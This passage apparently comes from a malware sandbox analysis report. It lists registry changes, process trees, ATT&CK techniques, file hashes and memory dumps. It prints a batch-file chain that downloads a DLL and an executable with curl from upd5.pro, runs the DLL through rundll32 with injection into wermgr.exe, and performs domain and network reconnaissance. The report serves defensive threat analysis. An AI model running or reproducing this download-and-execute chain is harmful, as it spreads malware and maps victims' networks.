Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\eodsqxkyueta\8b9d5358 = 059eb48c5d3561f2bee0a152257419c585dc2e648a8f2f848bf806179de4abaca64c268a74dfdfdec286ff61a92ed722c16e96e39fff41a0ea1159710a852d55664d0b1eda77466ace5f5d6e06bbb888cd8deb2a7703cddb0c7280bc95a8c066b2	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\eodsqxkyueta\6da42a25 = 8624a80aaad1cd590bdb3766e977208ed71c69f5689fee5fe5e76625877b6e13878c13be8c34306286addb25b8499eb6f4d1650fc62eb2dc13c10f672c959878cb	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\eodsqxkyueta\72eb310e = c44f3b443f4d9ad45d8b26bcca0443b4ec117e92d91fc80e676bbefc5afaa98a1d5dfd03ddefd687fefb50ef89b966f181e6b5ccaf8be791cee023f55ed6a2f282	wermgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\eodsqxkyueta\72eb310e = 47ff837fade4d3b4d009fa6fc1e700e1572afd3bbdd8d625cc70640a481dbb46675ff0936f4dc407dce8cf31e26eb7eef3dd9c36d964a1cabffa5d08556b45eb52	wermgr.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2276	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3672	rundll32.exe
3672	rundll32.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe
4360	wermgr.exe

Suspicious use of AdjustPrivilegeToken 28 IoCs

description	pid	Process
Token: SeDebugPrivilege	4988	whoami.exe
Token: SeDebugPrivilege	4988	whoami.exe
Token: SeDebugPrivilege	4988	whoami.exe
Token: SeDebugPrivilege	4988	whoami.exe
Token: SeDebugPrivilege	4988	whoami.exe
Token: SeDebugPrivilege	4988	whoami.exe
Token: SeDebugPrivilege	4988	whoami.exe
Token: SeDebugPrivilege	4988	whoami.exe
Token: SeDebugPrivilege	4988	whoami.exe
Token: SeDebugPrivilege	4988	whoami.exe
Token: SeDebugPrivilege	4988	whoami.exe
Token: SeDebugPrivilege	4988	whoami.exe
Token: SeDebugPrivilege	4988	whoami.exe
Token: SeDebugPrivilege	4988	whoami.exe
Token: SeDebugPrivilege	4988	whoami.exe
Token: SeDebugPrivilege	4988	whoami.exe
Token: SeDebugPrivilege	4988	whoami.exe
Token: SeDebugPrivilege	4988	whoami.exe
Token: SeDebugPrivilege	4988	whoami.exe
Token: SeDebugPrivilege	4988	whoami.exe
Token: SeDebugPrivilege	4988	whoami.exe
Token: SeDebugPrivilege	4988	whoami.exe
Token: SeDebugPrivilege	4988	whoami.exe
Token: SeDebugPrivilege	4988	whoami.exe
Token: SeDebugPrivilege	4988	whoami.exe
Token: SeDebugPrivilege	4988	whoami.exe
Token: SeDebugPrivilege	4988	whoami.exe
Token: SeSecurityPrivilege	4908	msiexec.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 3436 wrote to memory of 2128	3436	cmd.exe	88
PID 3436 wrote to memory of 2128	3436	cmd.exe	88
PID 3436 wrote to memory of 3672	3436	cmd.exe	95
PID 3436 wrote to memory of 3672	3436	cmd.exe	95
PID 3672 wrote to memory of 4360	3672	rundll32.exe	96
PID 3672 wrote to memory of 4360	3672	rundll32.exe	96
PID 3672 wrote to memory of 4360	3672	rundll32.exe	96
PID 3672 wrote to memory of 4360	3672	rundll32.exe	96
PID 3672 wrote to memory of 4360	3672	rundll32.exe	96
PID 3436 wrote to memory of 2348	3436	cmd.exe	97
PID 3436 wrote to memory of 2348	3436	cmd.exe	97
PID 3436 wrote to memory of 2276	3436	cmd.exe	98
PID 3436 wrote to memory of 2276	3436	cmd.exe	98
PID 3436 wrote to memory of 2968	3436	cmd.exe	99
PID 3436 wrote to memory of 2968	3436	cmd.exe	99
PID 3436 wrote to memory of 2968	3436	cmd.exe	99
PID 4360 wrote to memory of 4284	4360	wermgr.exe	103
PID 4360 wrote to memory of 4284	4360	wermgr.exe	103
PID 4360 wrote to memory of 4988	4360	wermgr.exe	105
PID 4360 wrote to memory of 4988	4360	wermgr.exe	105
PID 4360 wrote to memory of 1956	4360	wermgr.exe	107
PID 4360 wrote to memory of 1956	4360	wermgr.exe	107
PID 4360 wrote to memory of 3688	4360	wermgr.exe	109
PID 4360 wrote to memory of 3688	4360	wermgr.exe	109

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\u2.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3436
- C:\Windows\system32\curl.exe
  curl -o 02.dll https://upd5.pro/update/02.dll
  2⤵
  PID:2128
- C:\Windows\system32\rundll32.exe
  rundll32.exe 02.dll,checkit
  2⤵
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:3672
- - C:\Windows\System32\wermgr.exe
    C:\Windows\System32\wermgr.exe
    3⤵
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:4360
  - - C:\Windows\System32\ipconfig.exe
      ipconfig /all
      4⤵
      Gathers network information
      PID:4284
  - - C:\Windows\System32\whoami.exe
      whoami /all
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4988
  - - C:\Windows\System32\nltest.exe
      nltest /domain_trusts /all_trusts
      4⤵
      PID:1956
  - - C:\Windows\System32\qwinsta.exe
      qwinsta
      4⤵
      PID:3688
- C:\Windows\system32\curl.exe
  curl -o qd_x86.exe https://upd5.pro/update/qd_x86.exe
  2⤵
  PID:2348
- C:\Windows\system32\PING.EXE
  ping -n 5 localhost
  2⤵
  - Runs ping.exe
  PID:2276
- C:\Users\Admin\AppData\Local\Temp\qd_x86.exe
  qd_x86.exe
  2⤵
  - Executes dropped EXE
  PID:2968

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4908

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\02.dll

Filesize
3.5MB

MD5
4b7b85d70329e085ab06dcdf9557b0a0

SHA1
3a277203cb4916eb1f55f867f0bd368476c613fb

SHA256
49220571574da61781de37f35c66e8f0dadb18fdedb6d3a1be67485069cfd4b0

SHA512
50087b509b58a50db0a67f2aea2838c2783fb2d1d6f5a22d3a68b31e0cdfa7b3b5d469df16af437a6396d3f8dc75fafd689f9af9ce72bfb0c541a3f37ef77f03

Download Submit
C:\Users\Admin\AppData\Local\Temp\qd_x86.exe

Filesize
522KB

MD5
31b1a881401e0ba0cad4c56f1e32c48e

SHA1
19e491a4c69de056c77d05ba671870818d4f7f80

SHA256
7215d9421e0a6d1a7cfde3f6d742670550fed009585ab35b53cbb845f63c5f74

SHA512
459d6e38e633f22877add0b862319aa65484a015225e24cfea64d3bbebcde171d75857c063033035897a1d848b7c87833d0e3581d57558c0663b433db8b0154c

Download Submit
memory/3672-8-0x000001C3783E0000-0x000001C37840D000-memory.dmp

Filesize
180KB

Download
memory/3672-9-0x000001C379CF0000-0x000001C379D1F000-memory.dmp

Filesize
188KB

Download
memory/3672-10-0x000001C379CF0000-0x000001C379D1F000-memory.dmp

Filesize
188KB

Download
memory/3672-12-0x000001C379CF0000-0x000001C379D1F000-memory.dmp

Filesize
188KB

Download
memory/3672-14-0x000001C379CF0000-0x000001C379D1F000-memory.dmp

Filesize
188KB

Download
memory/3672-13-0x000001C379CF0000-0x000001C379D1F000-memory.dmp

Filesize
188KB

Download
memory/3672-25-0x000001C379CF0000-0x000001C379D1F000-memory.dmp

Filesize
188KB

Download
memory/3672-4-0x000001C379CC0000-0x000001C379CEF000-memory.dmp

Filesize
188KB

Download
memory/3672-22-0x000001C379CF0000-0x000001C379D1F000-memory.dmp

Filesize
188KB

Download
memory/3672-23-0x000001C379CF0000-0x000001C379D1F000-memory.dmp

Filesize
188KB

Download
memory/3672-3-0x000001C3783E0000-0x000001C37840D000-memory.dmp

Filesize
180KB

Download
memory/4360-57-0x0000020A0CA70000-0x0000020A0CA9F000-memory.dmp

Filesize
188KB

Download
memory/4360-70-0x0000020A0CA70000-0x0000020A0CA9F000-memory.dmp

Filesize
188KB

Download
memory/4360-27-0x0000020A0CA70000-0x0000020A0CA9F000-memory.dmp

Filesize
188KB

Download
memory/4360-37-0x0000020A0CA70000-0x0000020A0CA9F000-memory.dmp

Filesize
188KB

Download
memory/4360-36-0x0000020A0CA70000-0x0000020A0CA9F000-memory.dmp

Filesize
188KB

Download
memory/4360-38-0x0000020A0CA70000-0x0000020A0CA9F000-memory.dmp

Filesize
188KB

Download
memory/4360-39-0x0000020A0CA70000-0x0000020A0CA9F000-memory.dmp

Filesize
188KB

Download
memory/4360-40-0x0000020A0CA70000-0x0000020A0CA9F000-memory.dmp

Filesize
188KB

Download
memory/4360-24-0x0000020A0CA70000-0x0000020A0CA9F000-memory.dmp

Filesize
188KB

Download
memory/4360-46-0x0000020A0CA70000-0x0000020A0CA9F000-memory.dmp

Filesize
188KB

Download
memory/4360-49-0x0000020A0CA70000-0x0000020A0CA9F000-memory.dmp

Filesize
188KB

Download
memory/4360-52-0x0000020A0CA70000-0x0000020A0CA9F000-memory.dmp

Filesize
188KB

Download
memory/4360-53-0x0000020A0CA70000-0x0000020A0CA9F000-memory.dmp

Filesize
188KB

Download
memory/4360-16-0x0000020A0CA70000-0x0000020A0CA9F000-memory.dmp

Filesize
188KB

Download
memory/4360-55-0x0000020A0CA70000-0x0000020A0CA9F000-memory.dmp

Filesize
188KB

Download
memory/4360-56-0x0000020A0CA70000-0x0000020A0CA9F000-memory.dmp

Filesize
188KB

Download
memory/4360-15-0x0000020A0CAA0000-0x0000020A0CAA2000-memory.dmp

Filesize
8KB

Download
memory/4360-58-0x0000020A0CA70000-0x0000020A0CA9F000-memory.dmp

Filesize
188KB

Download
memory/4360-64-0x0000020A0CA70000-0x0000020A0CA9F000-memory.dmp

Filesize
188KB

Download
memory/4360-63-0x0000020A0CA70000-0x0000020A0CA9F000-memory.dmp

Filesize
188KB

Download
memory/4360-65-0x0000020A0CA70000-0x0000020A0CA9F000-memory.dmp

Filesize
188KB

Download
memory/4360-66-0x0000020A0CA70000-0x0000020A0CA9F000-memory.dmp

Filesize
188KB

Download
memory/4360-69-0x0000020A0CA70000-0x0000020A0CA9F000-memory.dmp

Filesize
188KB

Download
memory/4360-26-0x0000020A0CA70000-0x0000020A0CA9F000-memory.dmp

Filesize
188KB

Download
memory/4360-71-0x0000020A0CA70000-0x0000020A0CA9F000-memory.dmp

Filesize
188KB

Download
memory/4360-72-0x0000020A0CA70000-0x0000020A0CA9F000-memory.dmp

Filesize
188KB

Download
memory/4360-75-0x0000020A0CA70000-0x0000020A0CA9F000-memory.dmp

Filesize
188KB

Download
memory/4360-76-0x0000020A0CA70000-0x0000020A0CA9F000-memory.dmp

Filesize
188KB

Download
memory/4360-77-0x0000020A0CA70000-0x0000020A0CA9F000-memory.dmp

Filesize
188KB

Download
memory/4360-78-0x0000020A0CA70000-0x0000020A0CA9F000-memory.dmp

Filesize
188KB

Download
memory/4360-81-0x0000020A0CA70000-0x0000020A0CA9F000-memory.dmp

Filesize
188KB

Download
memory/4360-82-0x0000020A0CA70000-0x0000020A0CA9F000-memory.dmp

Filesize
188KB

Download
memory/4360-84-0x0000020A0CA70000-0x0000020A0CA9F000-memory.dmp

Filesize
188KB

Download
memory/4360-85-0x0000020A0CA70000-0x0000020A0CA9F000-memory.dmp

Filesize
188KB

Download
memory/4360-88-0x0000020A0CA70000-0x0000020A0CA9F000-memory.dmp

Filesize
188KB

Download
memory/4360-89-0x0000020A0CA70000-0x0000020A0CA9F000-memory.dmp

Filesize
188KB

Download
memory/4360-90-0x0000020A0CA70000-0x0000020A0CA9F000-memory.dmp

Filesize
188KB

Download
memory/4360-91-0x0000020A0CA70000-0x0000020A0CA9F000-memory.dmp

Filesize
188KB

Download
memory/4360-94-0x0000020A0CA70000-0x0000020A0CA9F000-memory.dmp

Filesize
188KB

Download
memory/4360-95-0x0000020A0CA70000-0x0000020A0CA9F000-memory.dmp

Filesize
188KB

Download
memory/4360-96-0x0000020A0CA70000-0x0000020A0CA9F000-memory.dmp

Filesize
188KB

Download
memory/4360-97-0x0000020A0CA70000-0x0000020A0CA9F000-memory.dmp

Filesize
188KB

Download
memory/4360-100-0x0000020A0CA70000-0x0000020A0CA9F000-memory.dmp

Filesize
188KB

Download
memory/4360-101-0x0000020A0CA70000-0x0000020A0CA9F000-memory.dmp

Filesize
188KB

Download
memory/4360-102-0x0000020A0CA70000-0x0000020A0CA9F000-memory.dmp

Filesize
188KB

Download
memory/4360-103-0x0000020A0CA70000-0x0000020A0CA9F000-memory.dmp

Filesize
188KB

Download
memory/4360-106-0x0000020A0CA70000-0x0000020A0CA9F000-memory.dmp

Filesize
188KB

Download